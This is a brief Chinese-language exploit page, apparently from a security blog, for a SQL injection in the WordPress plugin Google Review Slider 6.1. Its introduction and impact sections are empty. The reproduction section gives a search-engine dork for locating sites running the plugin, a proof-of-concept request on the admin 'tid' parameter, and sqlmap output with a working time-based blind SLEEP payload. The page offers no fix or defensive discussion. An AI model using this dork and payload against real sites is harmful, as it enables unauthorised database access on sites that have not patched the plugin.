001-WordPress Plugin – Google Review Slider 6.1 SQL Injection

# WordPress Plugin – Google Review Slider 6.1 SQL Injection

### 一、漏洞简介

### 二、漏洞影响

### 三、复现过程

“`bash
inurl:”/wp-content/plugins/wp-google-places-review-slider/”
“`

POC :

“`bash
GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
&taction=edit HTTP/1.1
“`

sqlmap result

“`bash
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:

Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容